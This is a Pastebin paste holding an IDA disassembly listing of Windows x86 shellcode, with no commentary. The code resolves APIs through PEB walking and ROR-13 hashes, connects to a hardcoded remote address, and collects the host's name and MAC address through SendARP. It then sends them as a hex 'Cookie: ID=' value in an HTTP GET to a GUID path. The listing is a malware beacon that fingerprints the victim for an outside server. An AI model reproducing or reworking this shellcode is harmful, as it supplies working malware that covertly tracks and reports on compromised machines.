Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- seg000:00000000 ; Segment type: Pure code
- seg000:00000000 seg000 segment byte public 'CODE' use32
- seg000:00000000 assume cs:seg000
- seg000:00000000 assume es:nothing, ss:nothing, ds:nothing, fs:nothing, gs:nothing
- seg000:00000000 pusha
- seg000:00000001 cld
- seg000:00000002 call sub_91
- seg000:00000007 pusha
- seg000:00000008 mov ebp, esp
- seg000:0000000A xor edx, edx
- seg000:0000000C mov edx, fs:[edx+30h]
- seg000:00000010 mov edx, [edx+0Ch]
- seg000:00000013 mov edx, [edx+14h]
- seg000:00000016
- seg000:00000016 loc_16: ; CODE XREF: seg000:0000008Ej
- seg000:00000016 mov esi, [edx+28h]
- seg000:00000019 movzx ecx, word ptr [edx+26h]
- seg000:0000001D xor edi, edi
- seg000:0000001F
- seg000:0000001F loc_1F: ; CODE XREF: seg000:0000002Dj
- seg000:0000001F xor eax, eax
- seg000:00000021 lodsb
- seg000:00000022 cmp al, 61h ; 'a'
- seg000:00000024 jl short loc_28
- seg000:00000026 sub al, 20h ; ' '
- seg000:00000028
- seg000:00000028 loc_28: ; CODE XREF: seg000:00000024j
- seg000:00000028 ror edi, 0Dh
- seg000:0000002B add edi, eax
- seg000:0000002D loop loc_1F
- seg000:0000002F push edx
- seg000:00000030 push edi
- seg000:00000031 mov edx, [edx+10h]
- seg000:00000034 mov eax, [edx+3Ch]
- seg000:00000037 add eax, edx
- seg000:00000039 mov eax, [eax+78h]
- seg000:0000003C test eax, eax
- seg000:0000003E jz short loc_8A
- seg000:00000040 add eax, edx
- seg000:00000042 push eax
- seg000:00000043 mov ecx, [eax+18h]
- seg000:00000046 mov ebx, [eax+20h]
- seg000:00000049 add ebx, edx
- seg000:0000004B
- seg000:0000004B loc_4B: ; CODE XREF: seg000:00000067j
- seg000:0000004B jecxz short loc_89
- seg000:0000004D dec ecx
- seg000:0000004E mov esi, [ebx+ecx*4]
- seg000:00000051 add esi, edx
- seg000:00000053 xor edi, edi
- seg000:00000055
- seg000:00000055 loc_55: ; CODE XREF: seg000:0000005Fj
- seg000:00000055 xor eax, eax
- seg000:00000057 lodsb
- seg000:00000058 ror edi, 0Dh
- seg000:0000005B add edi, eax
- seg000:0000005D cmp al, ah
- seg000:0000005F jnz short loc_55
- seg000:00000061 add edi, [ebp-8]
- seg000:00000064 cmp edi, [ebp+24h]
- seg000:00000067 jnz short loc_4B
- seg000:00000069 pop eax
- seg000:0000006A mov ebx, [eax+24h]
- seg000:0000006D add ebx, edx
- seg000:0000006F mov cx, [ebx+ecx*2]
- seg000:00000073 mov ebx, [eax+1Ch]
- seg000:00000076 add ebx, edx
- seg000:00000078 mov eax, [ebx+ecx*4]
- seg000:0000007B add eax, edx
- seg000:0000007D mov [esp+24h], eax
- seg000:00000081 pop ebx
- seg000:00000082 pop ebx
- seg000:00000083 popa
- seg000:00000084 pop ecx
- seg000:00000085 pop edx
- seg000:00000086 push ecx
- seg000:00000087 jmp eax
- seg000:00000089 ; ---------------------------------------------------------------------------
- seg000:00000089
- seg000:00000089 loc_89: ; CODE XREF: seg000:loc_4Bj
- seg000:00000089 pop eax
- seg000:0000008A
- seg000:0000008A loc_8A: ; CODE XREF: seg000:0000003Ej
- seg000:0000008A pop edi
- seg000:0000008B pop edx
- seg000:0000008C mov edx, [edx]
- seg000:0000008E jmp short loc_16
- seg000:0000008E ; ---------------------------------------------------------------------------
- seg000:00000090 dbCnt db 5
- seg000:00000091
- seg000:00000091 ; =============== S U B R O U T I N E =======================================
- seg000:00000091
- seg000:00000091
- seg000:00000091 sub_91 proc near ; CODE XREF: seg000:00000002p
- seg000:00000091 pop ebp
- seg000:00000092 cmp dword ptr [ebp+2E9h], 20544547h
- seg000:0000009C jnz short loc_10E
- seg000:0000009E lea eax, [ebp+2D1h] ; 0x2d8, ws2_32
- seg000:000000A4 push eax
- seg000:000000A5 push 726774Ch ; LoadLibraryA_salt
- seg000:000000AA call ebp
- seg000:000000AC test eax, eax
- seg000:000000AE jz short loc_10E
- seg000:000000B0 lea eax, [ebp+2D8h] ; 0x2df,IPHLPAPI
- seg000:000000B6 push eax
- seg000:000000B7 push 726774Ch ; LoadLibraryA_salt
- seg000:000000BC call ebp
- seg000:000000BE test eax, eax
- seg000:000000C0 jz short loc_10E
- seg000:000000C2 mov ebx, 190h
- seg000:000000C7 sub esp, ebx
- seg000:000000C9 push esp
- seg000:000000CA push ebx
- seg000:000000CB push 6B8029h ; WSAStartup_salt
- seg000:000000D0 call ebp
- seg000:000000D2 add esp, ebx
- seg000:000000D4 test eax, eax
- seg000:000000D6 jnz short loc_10E
- seg000:000000D8 push eax
- seg000:000000D9 push eax
- seg000:000000DA push eax
- seg000:000000DB push eax
- seg000:000000DC inc eax
- seg000:000000DD push eax
- seg000:000000DE inc eax
- seg000:000000DF push eax
- seg000:000000E0 push 0E0DF0FEAh ; WSASocketA_salt
- seg000:000000E5 call ebp
- seg000:000000E7 xor ebx, ebx
- seg000:000000E9 not ebx
- seg000:000000EB cmp ebx, eax
- seg000:000000ED jz short loc_10E
- seg000:000000EF mov ebx, eax
- seg000:000000F1
- seg000:000000F1 loc_F1: ; CODE XREF: sub_91+7Bj
- seg000:000000F1 push 10h
- seg000:000000F3 lea esi, [ebp+2E1h]
- seg000:000000F9 push esi
- seg000:000000FA push ebx
- seg000:000000FB push 6174A599h ; connect_salt
- seg000:00000100 call ebp
- seg000:00000102 test eax, eax
- seg000:00000104 jz short loc_125
- seg000:00000106 dec byte ptr [ebp+89h] ; dbCnt
- seg000:0000010C jnz short loc_F1
- seg000:0000010E
- seg000:0000010E loc_10E: ; CODE XREF: sub_91+Bj
- seg000:0000010E ; sub_91+1Dj ...
- seg000:0000010E cmp byte ptr [ebp+24Fh], 1
- seg000:00000115 jz short loc_11E
- seg000:00000117 call sub_257
- seg000:0000011C jmp short loc_123
- seg000:0000011E ; ---------------------------------------------------------------------------
- seg000:0000011E
- seg000:0000011E loc_11E: ; CODE XREF: sub_91+84j
- seg000:0000011E call sub_270
- seg000:00000123
- seg000:00000123 loc_123: ; CODE XREF: sub_91+8Bj
- seg000:00000123 jmp edi
- seg000:00000125 ; ---------------------------------------------------------------------------
- seg000:00000125
- seg000:00000125 loc_125: ; CODE XREF: sub_91+73j
- seg000:00000125 mov eax, 100h
- seg000:0000012A sub esp, eax
- seg000:0000012C mov edx, esp
- seg000:0000012E push edx
- seg000:0000012F push eax
- seg000:00000130 push edx
- seg000:00000131 push 1DE49B6h ; gethostname_salt
- seg000:00000136 call ebp
- seg000:00000138 pop edi
- seg000:00000139 add esp, 100h
- seg000:0000013F test eax, eax
- seg000:00000141 jnz loc_239
- seg000:00000147 push edi
- seg000:00000148 call sub_246
- seg000:0000014D pop esi
- seg000:0000014E mov edx, ecx
- seg000:00000150 lea edi, [ebp+2E9h]
- seg000:00000156 call sub_246
- seg000:0000015B dec edi
- seg000:0000015C cmp edx, 20h ; ' '
- seg000:0000015F jl short loc_166
- seg000:00000161 mov edx, 20h ; ' '
- seg000:00000166
- seg000:00000166 loc_166: ; CODE XREF: sub_91+CEj
- seg000:00000166 mov ecx, edx
- seg000:00000168 push esi
- seg000:00000169 rep movsb
- seg000:0000016B mov ecx, 0Dh
- seg000:00000170 lea esi, [ebp+2C4h]
- seg000:00000176 rep movsb
- seg000:00000178 mov [ebp+24Bh], edi
- seg000:0000017E pop esi
- seg000:0000017F push esi
- seg000:00000180 push 803428A9h ; gethostbyname_salt
- seg000:00000185 call ebp
- seg000:00000187 test eax, eax
- seg000:00000189 jz loc_239
- seg000:0000018F mov cx, [eax+0Ah]
- seg000:00000193 cmp cx, 4
- seg000:00000197 jb loc_239
- seg000:0000019D lea eax, [eax+0Ch]
- seg000:000001A0 mov eax, [eax]
- seg000:000001A2 mov ecx, [eax]
- seg000:000001A4 mov ecx, [ecx]
- seg000:000001A6 mov eax, 100h
- seg000:000001AB push eax
- seg000:000001AC mov edi, esp
- seg000:000001AE sub esp, eax
- seg000:000001B0 mov esi, esp
- seg000:000001B2 push edi
- seg000:000001B3 push esi
- seg000:000001B4 push ecx
- seg000:000001B5 push ecx
- seg000:000001B6 push 0B8D27248h ; SendARP_salt
- seg000:000001BB call ebp
- seg000:000001BD test eax, eax
- seg000:000001BF add esp, 104h
- seg000:000001C5 movzx ecx, word ptr [edi]
- seg000:000001C8 cmp ecx, 6
- seg000:000001CB jb short loc_239
- seg000:000001CD mov ecx, 6
- seg000:000001D2 mov eax, 10h
- seg000:000001D7 sub esp, eax
- seg000:000001D9 mov edi, esp
- seg000:000001DB mov edx, ecx
- seg000:000001DD shl edx, 1
- seg000:000001DF push eax
- seg000:000001E0 push edx
- seg000:000001E1
- seg000:000001E1 loc_1E1: ; CODE XREF: sub_91+17Aj
- seg000:000001E1 xor edx, edx
- seg000:000001E3 mov dl, [esi]
- seg000:000001E5 mov al, dl
- seg000:000001E7 and al, 0F0h
- seg000:000001E9 shr al, 4
- seg000:000001EC cmp al, 9
- seg000:000001EE ja short loc_1F4
- seg000:000001F0 add al, 30h ; '0'
- seg000:000001F2 jmp short loc_1F6
- seg000:000001F4 ; ---------------------------------------------------------------------------
- seg000:000001F4
- seg000:000001F4 loc_1F4: ; CODE XREF: sub_91+15Dj
- seg000:000001F4 add al, 37h ; '7'
- seg000:000001F6
- seg000:000001F6 loc_1F6: ; CODE XREF: sub_91+161j
- seg000:000001F6 mov [edi], al
- seg000:000001F8 inc edi
- seg000:000001F9 mov al, dl
- seg000:000001FB and al, 0Fh
- seg000:000001FD cmp al, 9
- seg000:000001FF ja short loc_205
- seg000:00000201 add al, 30h ; '0'
- seg000:00000203 jmp short loc_207
- seg000:00000205 ; ---------------------------------------------------------------------------
- seg000:00000205
- seg000:00000205 loc_205: ; CODE XREF: sub_91+16Ej
- seg000:00000205 add al, 37h ; '7'
- seg000:00000207
- seg000:00000207 loc_207: ; CODE XREF: sub_91+172j
- seg000:00000207 mov [edi], al
- seg000:00000209 inc edi
- seg000:0000020A inc esi
- seg000:0000020B loop loc_1E1
- seg000:0000020D pop ecx
- seg000:0000020E sub edi, ecx
- seg000:00000210 mov esi, edi
- seg000:00000212 pop eax
- seg000:00000213 add esp, eax
- seg000:00000215 mov edi, [ebp+24Bh]
- seg000:0000021B rep movsb
- seg000:0000021D mov byte ptr [ebp+24Fh], 1
- seg000:00000224 call sub_257
- seg000:00000229 xor eax, eax
- seg000:0000022B push eax
- seg000:0000022C push ecx
- seg000:0000022D sub edi, ecx
- seg000:0000022F dec edi
- seg000:00000230 push edi
- seg000:00000231 push ebx
- seg000:00000232 push 5F38EBC2h ; send_salt
- seg000:00000237 call ebp
- seg000:00000239
- seg000:00000239 loc_239: ; CODE XREF: sub_91+B0j
- seg000:00000239 ; sub_91+F8j ...
- seg000:00000239 push ebx
- seg000:0000023A push 614D6E75h ; closesocket_salt
- seg000:0000023F call ebp
- seg000:00000241 jmp loc_10E
- seg000:00000241 sub_91 endp ; sp-analysis failed
- seg000:00000241
- seg000:00000246
- seg000:00000246 ; =============== S U B R O U T I N E =======================================
- seg000:00000246
- seg000:00000246
- seg000:00000246 sub_246 proc near ; CODE XREF: sub_91+B7p
- seg000:00000246 ; sub_91+C5p ...
- seg000:00000246 xor ecx, ecx
- seg000:00000248 not ecx
- seg000:0000024A xor eax, eax
- seg000:0000024C repne scasb
- seg000:0000024E not ecx
- seg000:00000250 dec ecx
- seg000:00000251 retn
- seg000:00000251 sub_246 endp
- seg000:00000251
- seg000:00000251 ; ---------------------------------------------------------------------------
- seg000:00000252 db 0
- seg000:00000253 db 0
- seg000:00000254 db 0
- seg000:00000255 db 0
- seg000:00000256 db 0
- seg000:00000257
- seg000:00000257 ; =============== S U B R O U T I N E =======================================
- seg000:00000257
- seg000:00000257
- seg000:00000257 sub_257 proc near ; CODE XREF: sub_91+86p
- seg000:00000257 ; sub_91+193p
- seg000:00000257 lea edi, [ebp+2E9h]
- seg000:0000025D call sub_246
- seg000:00000262 dec edi
- seg000:00000263 mov ecx, 4Fh ; 'O'
- seg000:00000268 lea esi, [ebp+275h]
- seg000:0000026E rep movsb
- seg000:0000026E sub_257 endp ; sp-analysis failed
- seg000:0000026E
- seg000:00000270
- seg000:00000270 ; =============== S U B R O U T I N E =======================================
- seg000:00000270
- seg000:00000270
- seg000:00000270 sub_270 proc near ; CODE XREF: sub_91:loc_11Ep
- seg000:00000270 lea edi, [ebp+2E9h]
- seg000:00000276 call sub_246
- seg000:0000027B retn
- seg000:0000027B sub_270 endp
- seg000:0000027B
- seg000:0000027B ; ---------------------------------------------------------------------------
- seg000:0000027C aConnectionKeep db 0Dh,0Ah
- seg000:0000027C db 'Connection: keep-alive',0Dh,0Ah
- seg000:0000027C db 'Accept: */*',0Dh,0Ah
- seg000:0000027C db 'Accept-Encoding: gzip',0Dh,0Ah
- seg000:0000027C db 0Dh,0Ah,0
- seg000:000002BD ; ---------------------------------------------------------------------------
- seg000:000002BD add edi, 0Eh
- seg000:000002C0 xor ecx, ecx
- seg000:000002C2 not ecx
- seg000:000002C4 xor eax, eax
- seg000:000002C6 repe scasb
- seg000:000002C8 dec edi
- seg000:000002C9 jmp edi
- seg000:000002C9 ; ---------------------------------------------------------------------------
- seg000:000002CB aCookieId db 0Dh,0Ah
- seg000:000002CB db 'Cookie: ID='
- seg000:000002D8 aWs2_32 db 'ws2_32',0
- seg000:000002DF aIphlpapi db 'IPHLPAPI',0
- seg000:000002E8 dd 50000002h
- seg000:000002EC dd 36CADE41h
- seg000:000002F0 aGet05cea4de951 db 'GET /05cea4de-951d-4037-bf8f-f69055b279bb HTTP/1.1',0Dh,0Ah
- seg000:000002F0 db 'Host: ',0
- seg000:0000032B db 0
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement